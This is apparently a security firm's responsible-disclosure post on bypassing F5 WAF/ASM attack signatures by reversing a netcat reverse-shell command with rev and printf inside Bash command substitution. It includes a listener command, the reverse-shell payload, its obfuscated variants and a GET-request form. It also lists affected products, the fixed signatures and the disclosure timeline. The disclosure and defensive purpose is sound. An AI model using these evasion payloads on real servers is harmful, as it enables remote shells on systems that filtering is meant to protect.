F5 Advanced WAF / ASM Signature Bypass

Süleyman Özarslan, PhD | September 17, 2020

Süleyman Özarslan, PhD | September 17, 2020

Picus is dedicated to collaborating with its technology alliance partners and the cybersecurity community to build better cyber defenses against the adversary attempts. Accordingly, we have a responsible disclosure policy to publish vulnerabilities and bypass/evasion methods of security controls. We first notified the vendor, and after a grace period of 30 days, the new attack signature update was published.

Summary

We have discovered that the “rev” and “printf” commands incorporated with the Bash shell’s command substitution feature bypass certain attack signature checks of F5 Advanced WAF/ASM/NGINX App Protect products. We use this combination of commands in a command execution payload that creates a reverse shell to the target web server.

Affected product versions

  • BIG-IQ 7.X.X, 6.X.X, 5.X.X
  • BIG-IP, BIG-IP AFM, BIG-IP ASM 16.X.X, 15.X.X, 14.X.X, 13.X.X, 12.X.X, 11.6.X
  • Network Function Virtualization, F5 VNF Manager
  • NGINX Products, NGINX App Protect
  • Traffix SDC 5.X.X
  • F5 App Protect, F5 DDoS Hybrid Defender, F5 SSL Orchestrator 15.X.X, 14.X.X

Technical Details

Senior red ream analyst and team lead Evren Yalcin of Picus Labs has discovered that certain attack signature checks for command execution can be bypassed by a command that combines rev and printf commands in a command substitution payload to create a reverse shell.

We created a listener on the attacker system to listen for incoming connections from the reverse shell running on the victim system:

nc -lvp 1234

The following command is  our base payload that creates a reverse shell by using the netcat utility,  where 127.0.0.1 is the IP of the attacker system.

nc 127.0.0.1 1234 -e /bin/bash

As expected, this command is easily blocked by the WAF. Then we tried to use the rev command to bypass WAF.  rev command in Linux reverses the order of characters of a given file or string as shown in the following example:

who@tardis:~$ echo hello world | rev
dlrow olleh

So, we tried to run the following command:

hsab/nib/ e- 4321 1.0.0.721 cn|rev

However, it gives an error as follows:

who@tardis:~$  hsab/nib/ e- 4321 1.0.0.721 cn|rev
-bash: hsab/nib/: No such file or directory

Then, we used command substitution to run the command successfully. Command substitution is a bash feature that allows a command to be executed and its output to replace the command itself. 

The syntax of command substitution is:

$(command)

The command inside the parentheses executes, and the standard output of the command is returned as the value of the expression. 

At first, we used the echo command in the command substitution payload as follows:

$(echo hsab/nib/ e- 4321 1.0.0.721 cn|rev)

This payload is detected by the WAF as an echo execution attempt. Then, we tried to obfuscate the echo command using different methods, such as the following payload:

$(e\c\h\o hsab/nib/ e- 4321 1.0.0.721 cn|rev)

However, the WAF successfully blocked the payload with the same "echo" execution attempt signature. Then, we looked for alternatives to the echo command in Linux. Consequently, we tried the printf command:

$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)

It works like a charm without being blocked by the WAF signatures! A get request version of the payload looks like this:

GET /?p=$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)

Testing Web Application Firewalls

Picus Threat Library includes thousands of web application attack payloads and hundreds of WAF bypass payloads that tests effectiveness of Web Application Firewalls. The above payload is included in the Picus Threat Library as:

  • 517874 Remote Code Execution using “rev” Command Variant-7

Moreover, Picus Threat Library includes the following threats that tests this bypass method:

  • 712592 Remote Code Execution using  “rev” Command Variant-1
  • 534607 Remote Code Execution using  “rev” Command Variant-2
  • 427419 Remote Code Execution using  “rev” Command Variant-3
  • 305724 Remote Code Execution using  “rev” Command Variant-4
  • 312553 Remote Code Execution using  “rev” Command Variant-5
  • 313570 Remote Code Execution using  “rev” Command Variant-6

If you want to know whether your current enterprise security controls can block these types of attacks, please fill out the demo request form.

Mitigations

The F5 SIRT team promptly responded to each mail within one day throughout the entire process and quickly released mitigations.

Fixed Attack Signature Updates:

  • ASM-SignatureFile_20200805_144624.im
  • ASM-AttackSignatures_20200805_144624.im

Fixed Signatures:

  • 200003974 “rev” execution attempt (Parameter)
  • 200003975 "rev" execution attempt (Header) 
  • 200003984 “printf” execution attempt (Parameter)
  • 200003985 "printf" execution attempt (Header) 

F5 published the following advisory and acknowledged our researcher, Evren Yalcin:

Disclosure Timeline:

  • 20/07/2020 Summary of the bypass method sent to the F5 Security Incident Response Team (F5 SIRT)
  • 21/07/2020 Details are requested by F5 SIRT
  • 21/07/2020 Report sent to F5 SIRT
  • 22/07/2020 F5 SIRT opened a service request
  • 23/07/2020 F5 SIRT confirmed the payload and requested details
  • 05/08/2020 Details sent to F5 SIRT
  • 06/08/2020 F5 release fixed ASM attack signature update files
  • 18/08/2020 F5 publish the attack signature improvement article
  • 17/09/2020 Picus Security publicly disclosed the bypass method after a 30 days grace period.

Read more from Picus Security

MITRE ATT&CK T1053 Scheduled Task

MITRE ATT&CK T1086 PowerShell

ATT&CK in Action #5: T1059 Command-line Interface